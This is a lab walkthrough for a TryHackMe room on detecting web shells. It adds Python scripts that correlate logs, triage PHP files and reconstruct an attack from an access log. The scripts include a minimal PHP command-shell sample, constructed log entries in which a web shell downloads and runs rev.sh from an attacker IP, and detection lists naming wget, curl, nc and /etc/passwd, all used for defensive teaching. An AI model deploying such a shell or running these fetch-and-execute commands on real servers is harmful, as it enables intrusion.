https://tryhackme.com/room/detectingwebshells
Created by: tryhackme, ryla, TactfulTurtle

Before we begin, THM links to three prerequisite rooms. Check these out if you need a refresher:
Web Application Basics: HTTP Request Methods & Responses
MITRE: Initial Access & Persistence Tactics
Intro to Log Analysis: Common Log Formats

“Which MITRE ATT&CK Persistence sub-technique are web shells associated with?”
https://attack.mitre.org/techniques/T1505/003/

“What file extension is commonly used for web shells targeting Microsoft Exchange?”


In Task 3, Anatomy of a Web Shell, we are tasked with starting the VM and accessing the web shell it hosts.
“Access the shell and determine which account you have access to by running the whoami command.”

“List the directory contents and find the flag using the ls and cat commands.”
Run ls -la to list the directory, then cat flag.txt to obtain the flag.

On to Task 4, Log-based Detection! THM gives good example log snippets in this task, so take the time to read through them.



For the questions: “What is the part of the URL that associates values to parameters and can be a valuable indicator of web shell activity?” and “What auditd syscall would confirm that a file was written to disk following a suspicious POST request to /upload.php?”
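The second question is really about correlation: a POST to an upload handler in the web server's access log, followed a moment later by an auditd record showing the web server process writing a file under the web root. The script below is an added example of that correlation and is not code from the room. Every log line in it is constructed (the IPs, PIDs, inode numbers, paths and timestamps are made up), and it assumes a watch rule along the lines of auditctl -w /var/www/html -p wa -k webroot is in place so that file writes inside the web root are recorded at all.

```python
"""Correlate a suspicious POST in an Apache-style access log with auditd
records showing that a file was then written inside the web root.

Added example, not code from the TryHackMe room. Every log line below is
constructed: the IPs, paths, PIDs, inodes and timestamps are made up.
"""
import re
from datetime import datetime

# Constructed Apache combined-log lines (hypothetical data).
ACCESS_LOG = """\
10.10.14.5 - - [12/Mar/2024:10:14:02 +0000] "GET /upload.php HTTP/1.1" 200 980 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:14:09 +0000] "POST /upload.php HTTP/1.1" 200 144 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:14:15 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
"""

# Constructed auditd records (hypothetical). With a watch such as
#   auditctl -w /var/www/html -p wa -k webroot
# a file created by the web server shows up as a SYSCALL record for openat(2)
# whose flags request writing (a2=241 is O_WRONLY|O_CREAT|O_TRUNC), followed
# by PATH records; the one with nametype=CREATE names the new file. write(2)
# itself carries no path, so a watch cannot tie it to a file; you can audit
# it with -S write, but you still pivot through the open that made the fd.
# Event 502 is the server appending to its own log: a write, but outside
# the web root, so it must not be reported.
AUDIT_LOG = """\
type=SYSCALL msg=audit(1710238449.120:501): arch=c000003e syscall=openat success=yes exit=12 a0=ffffff9c a1=55d1c8a3e2a0 a2=241 a3=1b6 items=2 ppid=1200 pid=1337 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key="webroot"
type=CWD msg=audit(1710238449.120:501): cwd="/var/www/html"
type=PATH msg=audit(1710238449.120:501): item=0 name="/var/www/html/uploads/" inode=131075 dev=08:01 mode=040755 ouid=33 ogid=33 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1710238449.120:501): item=1 name="/var/www/html/uploads/shell.php" inode=131091 dev=08:01 mode=0100644 ouid=33 ogid=33 rdev=00:00 nametype=CREATE
type=SYSCALL msg=audit(1710238449.131:502): arch=c000003e syscall=openat success=yes exit=13 a0=ffffff9c a1=55d1c8a41100 a2=441 a3=1a4 items=1 ppid=1200 pid=1337 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key="logs"
type=PATH msg=audit(1710238449.131:502): item=0 name="/var/log/apache2/access.log" inode=262401 dev=08:01 mode=0100644 ouid=0 ogid=4 rdev=00:00 nametype=NORMAL
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUDIT_RE = re.compile(r'^type=(?P<type>\w+) msg=audit\((?P<epoch>\d+\.\d+):(?P<serial>\d+)\): (?P<rest>.*)$')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

O_ACCMODE = 0o3  # low two bits of open flags: 0 = O_RDONLY
WRITE_SYSCALLS = {"write", "pwrite64", "writev", "creat", "rename", "renameat", "renameat2", "open", "openat"}
WEB_ROOT = "/var/www/"


def parse_access(text):
    """Access-log lines -> dicts with an epoch timestamp for time correlation."""
    events = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            epoch = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
            events.append({"ip": m["ip"], "epoch": epoch, "method": m["method"],
                           "path": m["path"], "status": int(m["status"])})
    return events


def parse_audit(text):
    """Group auditd records by event serial; keep the syscall, open flags and non-parent PATH names."""
    events = {}
    for line in text.splitlines():
        m = AUDIT_RE.match(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in KV_RE.findall(m["rest"])}
        ev = events.setdefault(m["serial"], {"epoch": float(m["epoch"]), "syscall": None,
                                             "comm": None, "flags": 0, "paths": []})
        if m["type"] == "SYSCALL":
            ev["syscall"] = fields.get("syscall")
            ev["comm"] = fields.get("comm")
            # flags are the 3rd argument of openat(2) and the 2nd of open(2)
            ev["flags"] = int(fields.get("a2" if ev["syscall"] == "openat" else "a1", "0"), 16)
        elif m["type"] == "PATH" and fields.get("nametype") != "PARENT":
            ev["paths"].append(fields.get("name", ""))
    return list(events.values())


def writes_to_webroot(ev):
    """True if the event is a write-class syscall naming a file under the web root."""
    if ev["syscall"] not in WRITE_SYSCALLS:
        return False
    if ev["syscall"] in ("open", "openat") and (ev["flags"] & O_ACCMODE) == 0:
        return False  # opened read-only, not a write
    return any(p.startswith(WEB_ROOT) for p in ev["paths"])


def correlate(access_events, audit_events, window=5.0):
    """Pair each POST/PUT with web-root writes in the following `window` seconds.

    Apache stamps the request with its start time, so the write lands at or after it."""
    findings = []
    for req in access_events:
        if req["method"] not in ("POST", "PUT"):
            continue
        for ev in audit_events:
            if writes_to_webroot(ev) and req["epoch"] <= ev["epoch"] <= req["epoch"] + window:
                findings.append({"ip": req["ip"], "request": f'{req["method"]} {req["path"]}',
                                 "syscall": ev["syscall"], "comm": ev["comm"],
                                 "files": [p for p in ev["paths"] if p.startswith(WEB_ROOT)]})
    return findings


if __name__ == "__main__":
    for f in correlate(parse_access(ACCESS_LOG), parse_audit(AUDIT_LOG)):
        print(f)
```

On a real box the same pivot is ausearch -k webroot -ts recent (then ausearch -i to decode the syscall names and flags), with the PID and comm in the SYSCALL record confirming it was the web server, not a deploy script, that wrote the file.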

On to Task 5, Beyond Logs!



For the questions: “What command would you use to locate .php files in the /var/www/ directory?” and “Which Wireshark filter would you use to search specifically for PUT requests?”
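Locating the .php files is only the first step; on a real web root there are hundreds of them, so the useful part is triaging what you found. The script below is an added example of that triage and is not code from the room: it walks a directory the way find does, then flags files that call code-execution functions on request input, use decoders or long encoded blobs, or were modified recently. The file contents and paths it writes into a temporary directory are constructed for illustration, and the indicator list is a starting point, not a complete signature set.

```python
"""Find PHP files under a web root and triage them for web-shell indicators.

Added example, not code from the TryHackMe room. The file contents and paths
in demo() are constructed for illustration.
"""
import os
import re
import tempfile
import time

# Functions that turn an attacker-controlled string into code or a command.
DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*\(",
    re.IGNORECASE,
)
# Superglobals carrying request data straight from the client.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
# Obfuscation: decoders and long base64-looking string literals.
DECODERS = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.IGNORECASE)
LONG_BLOB = re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")

PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")


def scan_source(src):
    """Return the indicator names found in one PHP source string (empty list if clean)."""
    found = []
    calls = {m.group(1).lower() for m in DANGEROUS_CALLS.finditer(src)}
    if calls:
        found.append("dangerous_call:" + ",".join(sorted(calls)))
    # Co-occurrence only, not taint tracking: a dangerous call in a file that
    # also reads request data is enough to pull it for manual review.
    if calls and REQUEST_INPUT.search(src):
        found.append("request_input_reaches_code")
    if DECODERS.search(src):
        found.append("decoder_call")
    if LONG_BLOB.search(src):
        found.append("long_encoded_blob")
    return found


def find_php_files(root):
    """Yield every PHP-looking file under root (what `find root -name '*.php'` does)."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(PHP_EXTENSIONS):
                yield os.path.join(dirpath, name)


def triage(root, recent_seconds=86400):
    """Scan all PHP files under root; return (path, indicators) for files with any hit."""
    now = time.time()
    results = []
    for path in find_php_files(root):
        with open(path, "r", errors="replace") as fh:
            indicators = scan_source(fh.read())
        if now - os.stat(path).st_mtime < recent_seconds:
            indicators.append("recently_modified")  # new file in an old tree is suspicious on its own
        if indicators:
            results.append((path, indicators))
    return sorted(results, key=lambda r: -len(r[1]))


# Constructed sample files: a harmless page and a minimal command shell.
BENIGN = "<?php\n$page = htmlspecialchars($_GET['page'] ?? 'home');\necho \"<h1>$page</h1>\";\n"
SHELL = "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>"


def demo():
    """Build a throwaway web root, run triage, return results with paths relative to it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(BENIGN)
        with open(os.path.join(root, "uploads", "img.php"), "w") as fh:
            fh.write(SHELL)
        old = time.time() - 30 * 86400
        os.utime(os.path.join(root, "index.php"), (old, old))  # make the legitimate file look old
        return [(os.path.relpath(p, root).replace(os.sep, "/"), ind) for p, ind in triage(root)]


if __name__ == "__main__":
    for path, indicators in demo():
        print(path, indicators)
```

The mtime check is the cheap filter you would apply first on a live host (find /var/www -type f -name '*.php' -newermt '-1 day'); the content checks are what you run over whatever that leaves, since a shell can be backdated with touch but still has to call something that executes its input.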

On to Task 6, Investigation!

“Which IP address likely belongs to the attacker?”

“What is the first directory that the attacker successfully identifies?”

“What is the name of the .php file the attacker uses to upload the web shell?”
I used the command cat access.log | grep "php"

“What is the first command run by the attacker using the newly uploaded web shell?”

“After gaining access via the web shell, the attacker uses a command to download a second file onto the server. What is the name of this file?”

“The attacker has hidden a secret within the web shell.
Use cat to investigate the web shell code and find the flag.”
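The investigation questions above are the same handful of pivots every time: which client is scanning, what the scan found, which script accepted the upload, and what was then passed through the shell's query string. The script below is an added example, not code from the room, that answers them over a constructed access log; it does not use the room's own access.log, and the IPs, paths and file names in it are made up, so its answers will not match the room's. It also shows the Task 4 point about query strings: the cmd= parameter is where the attacker's commands (and the wget that fetches the second file) end up in the log, URL-encoded.

```python
"""Walk an Apache access log and pull out the facts an investigation asks for:
the attacker's IP, the first directory they found, the upload script, the
commands run through the web shell, and any file fetched with wget/curl.

Added example, not code from the TryHackMe room. The log below is
constructed; IPs, paths and file names are made up.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

SAMPLE_ACCESS_LOG = """\
192.168.1.20 - - [12/Mar/2024:10:12:40 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:13:01 +0000] "GET /backup/ HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.5 - - [12/Mar/2024:10:13:01 +0000] "GET /config/ HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.5 - - [12/Mar/2024:10:13:02 +0000] "GET /admin/ HTTP/1.1" 200 1450 "-" "gobuster/3.6"
10.10.14.5 - - [12/Mar/2024:10:13:02 +0000] "GET /uploads/ HTTP/1.1" 403 279 "-" "gobuster/3.6"
10.10.14.5 - - [12/Mar/2024:10:13:40 +0000] "GET /admin/upload.php HTTP/1.1" 200 980 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:14:09 +0000] "POST /admin/upload.php HTTP/1.1" 200 144 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:14:15 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:14:31 +0000] "GET /uploads/shell.php?cmd=wget%20http%3A%2F%2F10.10.14.5%3A8000%2Frev.sh%20-O%20%2Ftmp%2Frev.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Mar/2024:10:14:36 +0000] "GET /uploads/shell.php?cmd=bash%20%2Ftmp%2Frev.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Mar/2024:10:15:00 +0000] "GET /about.php?page=team HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter names web shells commonly read their command from, plus words in a
# value that look like a command line even when the parameter has been renamed.
COMMAND_PARAMS = {"cmd", "c", "command", "exec", "execute", "run"}
SHELL_WORDS = ("wget ", "curl ", "bash ", "sh ", "nc ", "python", "whoami", "chmod ", "/etc/passwd", "base64")


def parse_access(text):
    """Access-log lines -> dicts; the query string is URL-decoded into (key, value) pairs."""
    events = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        events.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"], "path": url.path,
                       "query": parse_qsl(url.query), "status": int(m["status"])})
    return events


def likely_attacker(events):
    """Directory brute-forcing produces many 4xx responses: rank clients by errors, then volume."""
    errors = Counter(e["ip"] for e in events if 400 <= e["status"] < 500)
    total = Counter(e["ip"] for e in events)
    return max(total, key=lambda ip: (errors[ip], total[ip]))


def first_directory_found(events, ip):
    """First directory request from ip that the server answered with 200 or a 301 redirect."""
    for e in events:
        if e["ip"] == ip and e["path"].endswith("/") and e["status"] in (200, 301):
            return e["path"]
    return None


def upload_script(events, ip):
    """First successful POST to a PHP script: the handler the attacker uploaded through."""
    for e in events:
        if e["ip"] == ip and e["method"] == "POST" and e["status"] == 200 and e["path"].endswith(".php"):
            return e["path"]
    return None


def webshell_commands(events, ip=None):
    """Query-string values that look like commands, in log order, as (ts, path, key, value)."""
    cmds = []
    for e in events:
        if ip is not None and e["ip"] != ip:
            continue
        for key, value in e["query"]:
            if key.lower() in COMMAND_PARAMS or any(w in value for w in SHELL_WORDS):
                cmds.append((e["ts"], e["path"], key, value))
    return cmds


def downloaded_files(cmds):
    """Base names of URLs fetched by wget/curl commands seen in the web shell traffic."""
    names = []
    for _, _, _, value in cmds:
        tokens = value.split()
        if tokens and tokens[0] in ("wget", "curl"):
            for t in tokens:
                if t.startswith(("http://", "https://", "ftp://")):
                    names.append(urlsplit(t).path.rsplit("/", 1)[-1])
    return names


def investigate(text):
    events = parse_access(text)
    attacker = likely_attacker(events)
    cmds = webshell_commands(events, attacker)
    return {"attacker": attacker,
            "first_directory": first_directory_found(events, attacker),
            "upload_script": upload_script(events, attacker),
            "commands": cmds,
            "first_command": cmds[0][3] if cmds else None,
            "downloaded_files": downloaded_files(cmds)}


if __name__ == "__main__":
    for key, value in investigate(SAMPLE_ACCESS_LOG).items():
        print(f"{key}: {value}")
```

Decoding the query string before grepping matters: a grep for "wget" on the raw log misses wget%20 only if the tool encodes the space, but it will always miss %2F-encoded paths and anything the attacker base64-wrapped, which is why the script decodes first and then looks at parameter names and values.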

